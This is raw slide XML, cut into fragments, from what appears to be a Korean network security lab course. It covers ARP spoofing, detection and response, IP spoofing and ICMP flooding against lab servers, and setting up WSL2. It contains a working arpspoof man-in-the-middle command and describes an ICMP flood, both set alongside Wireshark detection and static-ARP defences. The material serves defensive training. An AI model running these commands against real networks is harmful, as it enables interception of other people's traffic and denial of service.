                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC5C34CE-9DB9-4F99-A23E-9EEAA0C960A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6931"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6291146" y="3429000"/>
            <a:ext cx="5400674" cy="2952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7152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dirty="0" err="1"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에서 패킷이 못 들어오는 것을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145" name="_x211873080">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{418B28AB-5CE6-41CC-A21E-6C3C11F00E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63092"/>
            <a:ext cx="5400675" cy="3224213"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6147" name="_x211873320">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{34824776-95F2-4D0E-A06B-538B88B78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7730" y="663092"/>
            <a:ext cx="5400675"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09444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/Training/Unit/Net/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. ARP Spoofing</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게이트웨이</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전송되는 모든 패킷들이 공격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(10.10.1.166)</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전송되도록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ARP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ARP Spoofing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 ARP Spoofing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공격을 탐지하고 대응할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79368900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실습 서버에서 공격 서버를 게이트웨이로 인식하도록 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>스푸핑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 공격을 주기적으로 수행</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101(Target IP) 10.10.1.1(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>호스트 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>IP) &amp;(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>백그라운드 실행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    # </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arpspoof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> –t 10.10.1.101 10.10.1.1 &amp;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Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>를 사용하여 실습 서버에서 게이트웨이로 전송한 패킷들이 공격 서버로 전송되는 것을 확인</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72040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 확인을 위해 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>명령으로 공격서버에 접속하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소를 확인해보면 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>주소가 변조 되었다는 것을 알 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="100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5" name="_x197191872">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E890E658-F2C6-4221-91E8-AB712CD86C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1109133"/>
            <a:ext cx="5400675" cy="1285875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1027" name="_x197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55727A18-6557-42E6-83B7-798CFCA9A6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9107"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="3043882"/>
            <a:ext cx="5400675" cy="3323052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1029" name="_x197186512">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3269E7C-7B5F-4F72-9E70-3592832977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5" y="871008"/>
            <a:ext cx="5400675" cy="3048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A4E4ED3-BDCA-4D45-97D1-5F6CDD960B13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="4291914"/>
            <a:ext cx="5616792" cy="2197084"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>acheck</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(* history –w </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행하여 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>에 저장</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1031" name="_x197192112">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{900F0CEB-751B-4FFF-A4C1-6BCBFA25F5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5" y="4898652"/>
            <a:ext cx="3946525"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51967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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 교관공격 버튼 클릭 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Setup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2" y="2211036"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="2049" name="_x197187632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B06D8ADC-3A95-4866-A761-646AF88742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063" y="863600"/>
            <a:ext cx="5400675" cy="70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07661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/Training/Unit/Net/9</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 9. ARP Spoofing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실습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ARP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받고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게이트웨이</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와의 통신을 위해</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게이트웨이의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ARP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캐시에 정적으로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ARP Spoofing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ARP Spoofing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DF88C7B9-9BAF-4477-A2F0-B4FB8C5AB8D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19415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Wireshark </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행</a:t>
            </a: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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod" startAt="2"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>로 패킷 확인</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>* 지속적으로 잘못된 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>MAC </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소가 담긴 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP Reply Packet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 보내 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>victim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>의 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>캐시를 조작하게 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2035535"/>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arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -s 10.10.1.1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>aa:bb:cc:dd:ee:ff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> (MAC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>주소</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"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a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>4.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>정적으로 설정이 되어 있는지 확인</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>arp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> -a</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3" name="_x197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D830F87-2103-47B3-A625-23A5DDE0E6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747710"/>
            <a:ext cx="5400675" cy="2681288"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3075" name="_x197187392">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22CF92EE-012E-4DA5-8390-7E25C8A8F50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5957"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="500180" y="4286660"/>
            <a:ext cx="5400675" cy="2088740"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3077" name="_x197193552">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5BACF93-B2D1-4B2B-BE76-2660531771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6134" y="747710"/>
            <a:ext cx="4198938" cy="182563"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3079" name="_x197193632">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47162951-6D3E-485B-92B5-3D5A0E55B3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16134" y="1786467"/>
            <a:ext cx="4297363" cy="42703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376B17F8-913C-4664-A837-ED28F8D00748}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183088" y="2543623"/>
            <a:ext cx="5616792" cy="3945375"/>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check</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3081" name="_x197185712">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E486C6-C272-413D-B244-829BC82EBA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90275" y="3009898"/>
            <a:ext cx="3222625"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9649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/Environ/WSL2(command)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> WSL2 command </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>설치</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="화살표: 오른쪽 20">
            <a:hlinkClick r:id="rId2"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0B2AB5BF-8041-499A-A7F3-92EF61AFA96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EB34B6-6C69-4531-A55D-CE4F93D989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DD3723E-EBE5-46F9-BBF7-C1BB198612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6531D6E2-6525-432C-BC29-B104F888CAC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742CF30C-F93B-4682-BAAB-B954723A9E9E}"/>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컴퓨터 좌측 하단의 돋보기에서 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>Terminal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>을 검색하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>관리자 권한으로 터미널을 실행</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12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BAAA65A-71A5-4780-BF01-B99D6B8C9C7B}"/>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50" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1050" dirty="0"/>
              <a:t>윈도우 터미널에 아래 명령어를 순서대로 입력해주세요</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1050" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:Microsoft-Windows-Subsystem-Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dism.exe /online /enable-feature /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>featurename:VirtualMachinePlatform</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t> /all /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>norestart</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>3. 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>번 작업이 완료되었다면 설정을 적용하기 위해 컴퓨터를 재부팅 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32" name="그림 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2EC6FA7-4498-4570-9B21-75490F642E1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1724680" y="2334397"/>
            <a:ext cx="2574664" cy="2735580"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="33" name="그림 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DF4653D5-2E18-4895-9B26-24D34689A3E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776915" y="3198113"/>
            <a:ext cx="4816822" cy="2373820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="직사각형 33">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{692609C5-9B2A-43F5-B84C-1C472EA3B1DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="3746501"/>
            <a:ext cx="4750621" cy="2120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6F5615FE-16A6-4D74-9CF8-10323D928F76}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6776914" y="4553212"/>
            <a:ext cx="4750621" cy="2120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6263554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/Training/Unit/Net/10</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t> 10. IP Spoofing</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서버를 대상으로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ICMP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플러딩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192.168.99.11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데이터 크기를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IP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IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>스푸핑</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 공격을 탐지하고 대응할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9127791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실습 서버를 대상으로 데이터 크기가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>100 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>바이트인 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>ICMP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>패킷을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>플러딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
